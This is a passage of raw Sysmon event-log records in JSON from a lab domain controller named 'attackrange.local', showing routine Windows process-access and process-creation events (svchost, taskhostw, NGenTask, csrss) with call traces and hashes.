.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6430,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.585\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+10038|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.585","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+10038|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6431,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.585\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001014B90000}\r\nTargetProcessId: 1132\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\lsm.dll+b81f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.585","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001014B90000}","TargetProcessId":"1132","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\lsm.dll+b81f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6432,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.610\r\nProcessGuid: {41C8662E-21BC-5F25-0000-0010E0B70900}\r\nProcessId: 3060\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngentask.exe\r\nFileVersion: 4.7.2053.0 built by: NET47REL1\r\nDescription: Microsoft .NET Framework optimization service\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: NGenTask.exe\r\nCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe\" /RuntimeWide /StopEvent:348\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=310EC059A68DEB69CFC32CFA946FEFE0,SHA256=7BC95DCD791A505FDD9FD0E117EB0BD5AC4F28176E8127FFB39521DAEF670970,IMPHASH=00000000000000000000000000000000\r\nParentProcessGuid: {41C8662E-21BC-5F25-0000-0010EEAA0900}\r\nParentProcessId: 1824\r\nParentImage: C:\\Windows\\System32\\taskhostw.exe\r\nParentCommandLine: taskhostw.exe /RuntimeWide","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.610","ProcessGuid":"{41C8662E-21BC-5F25-0000-0010E0B70900}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngentask.exe","FileVersion":"4.7.2053.0 built by: NET47REL1","Description":"Microsoft .NET Framework optimization service","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"NGenTask.exe","CommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe\" /RuntimeWide /StopEvent:348","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=310EC059A68DEB69CFC32CFA946FEFE0,SHA256=7BC95DCD791A505FDD9FD0E117EB0BD5AC4F28176E8127FFB39521DAEF670970,IMPHASH=00000000000000000000000000000000","ParentProcessGuid":"{41C8662E-21BC-5F25-0000-0010EEAA0900}","ParentProcessId":"1824","ParentImage":"C:\\Windows\\System32\\taskhostw.exe","ParentCommandLine":"taskhostw.exe /RuntimeWide","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6433,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.601\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-0010EEAA0900}\r\nSourceProcessId: 1824\r\nSourceThreadId: 4292\r\nSourceImage: C:\\Windows\\system32\\taskhostw.exe\r\nTargetProcessGUID: {41C8662E-21BC-5F25-0000-0010E0B70900}\r\nTargetProcessId: 3060\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b56bc|UNKNOWN(00007FFD152C11E2)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.601","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-0010EEAA0900}","SourceProcessId":"1824","SourceThreadId":"4292","SourceImage":"C:\\Windows\\system32\\taskhostw.exe","TargetProcessGUID":"{41C8662E-21BC-5F25-0000-0010E0B70900}","TargetProcessId":"3060","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b56bc|UNKNOWN(00007FFD152C11E2)","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6434,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.601\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21BC-5F25-0000-0010E0B70900}\r\nTargetProcessId: 3060\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.601","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21BC-5F25-0000-0010E0B70900}","TargetProcessId":"3060","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6435,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.601\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.601","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6436,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.601\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.601","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6437,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.601\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.601","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6438,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.601\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 